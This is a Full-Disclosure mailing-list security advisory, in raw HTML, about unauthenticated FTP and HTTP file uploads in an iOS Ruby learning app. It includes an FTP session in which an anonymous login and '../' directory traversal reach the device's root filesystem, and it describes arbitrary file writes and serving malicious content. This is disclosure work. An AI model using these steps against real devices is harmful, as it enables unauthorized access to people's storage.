[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Unauthenticated Remote File Upload via HTTP for ruby-Programming language 1.7 on iOS
- To: full <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Unauthenticated Remote File Upload via HTTP for ruby-Programming language 1.7 on iOS
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Wed, 11 Sep 2013 20:47:10 +0000 (GMT)
<html><body><div><b style="font-family: Times; font-size: medium; ">TITLE:
Unauthenticated Remote File Upload via HTTP for ruby-Programming language 1.7
on iOS</b></div><div><font face="Times" size="3"><b><br></b></font><span
style="font-family: Times; font-size: medium; "></span><p style="font-family:
Times; font-size: medium; ">Date: 8/1/2013</p><p style="font-family: Times;
font-size: medium; ">Author: Larry W. Cashdollar, @_larry0</p><p
style="font-family: Times; font-size: medium; "><br></p><p style="font-family:
Times; font-size: medium; ">Download:</p><ol style="font-family: Times;
font-size: medium;
"><li>https://itunes.apple.com/us/app/ruby-programming-language/id581732143?mt=8&ls=1</li><li>http://www.tayutec.com/indexen.html</li></ol><p
style="font-family: Times; font-size: medium; ">Description: "This is an ios
ruby app,you can learn,run,share ruby script. Features
: <br>Autocomplate.<br>Auto Indent.<br>Code color.<br>In(the built-in
browser or the txt editor),Select the text to run.<br>Horizontal screen
development.</p><p style="font-family: Times; font-size: medium; ">Code
templates, the contents of the new file is copy from contents of the template
file.</p><ul style="font-family: Times; font-size: medium; "><li>You can enter
ruby code by keyboard or two-dimensional code, and then you can execut the ruby
code,support the gets function.</li><li>You can adjust the code color and font
size, and support to move the cursor left and right and up and down , easy to
read and write.</li><li>You can upload learning materials to the local on the
computer via wifi, support http and ftp two upload ways. The file system
supports txt, pdf, chm, mp3,m4v,zip, gif, png, html, rb, doc ...</li><li>You
can find learning materials by the built-in browser.</li><li>You can save ruby
code and learning materials, and can be modified to the save file and delete
the save file .</li><li>You can control the background image and color, and
execution voice, background animation, text color and shadow, switch interface
animation, the number and the order of the main interface of the tab bar to
create your learning software.</li><li>You can Learn ruby knowledge, the system
provides some basic learning materials.</li><li>You can use ruby code or
learning materials to generate two-dimensional code , for easy sharing
.</li><li>You can share code by Email,Weibo,Twitter,Facebook.</li><li>You can
use the counter,light in the Setting tab."</li></ul><span style="font-family:
Times; font-size: medium; ">Vulnerabilities: 'iOSftp' & http
unauthenticated file uplolads. The application is sandboxed, but any remote
user can read/write to the devices storage.</span><br style="font-family:
Times; font-size: medium; "><span style="font-family: Times; font-size: medium;
"><br></span></div><div><span style="font-family: Times; font-size: medium;
">The uploaded content is served out of the http servers directory. While the
http server doesn't process server side scripts it is possible to upload and
serve malicious / illegal content. </span><br style="font-family: Times;
font-size: medium; "><span style="font-family: Times; font-size: medium;
"><br></span></div><div><span style="font-family: Times; font-size: medium; ">I
would think it's also possible to fill up the devices storage as well but did
not test it.</span><pre>larry$ ftp 192.168.0.31 10000
Connected to 192.168.0.31.
220 iosFtp server ready.
Name (192.168.0.31:larry): anyone
331 Password required for anyone
Password:
230 User anyone logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory:
/private/var/mobile/Applications/0F96EC13-FD37-4A0D-A054-6A4A93F8DC5A/Documents/ftp
*
ftp> cd ../../../../
250 CWD command successful.
ftp> pwd
Remote directory: /private/var/mobile
ftp> cd /
250 CWD command successful.
ftp> pwd
Remote directory: /
ftp> </pre><span style="font-family: Times; font-size: medium; ">* You also
get path disclosure.</span><p style="font-family: Times; font-size: medium;
">HTTP server listening on port 8080 allows arbitrary file writes to
storage.</p><span style="font-family: Times; font-size: medium; ">You can
create directories out side the upload path through the file upload web
interface and the .. bug. Because the application is sandbox I was unable to
overwtite application executables and components so impact is limited. As
stated above you can serve malicious content (javascript/html) via
http. </span><br style="font-family: Times; font-size: medium; "><img
src="http://vapid.dhs.org/advisories/webint.gif"; style="font-family: Times;
font-size: medium; "><span style="font-family: Times; font-size: medium;
"> </span><br style="font-family: Times; font-size: medium; "><p
style="font-family: Times; font-size: medium; ">Vendor: Notified 8/1/2013,
https://twitter.com/tayutec</p><span style="font-family: Times; font-size:
medium; ">Advisory:
http://vapid.dhs.org/advisories/ruby-ios-Huang-XiaoWen.html</span></div></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/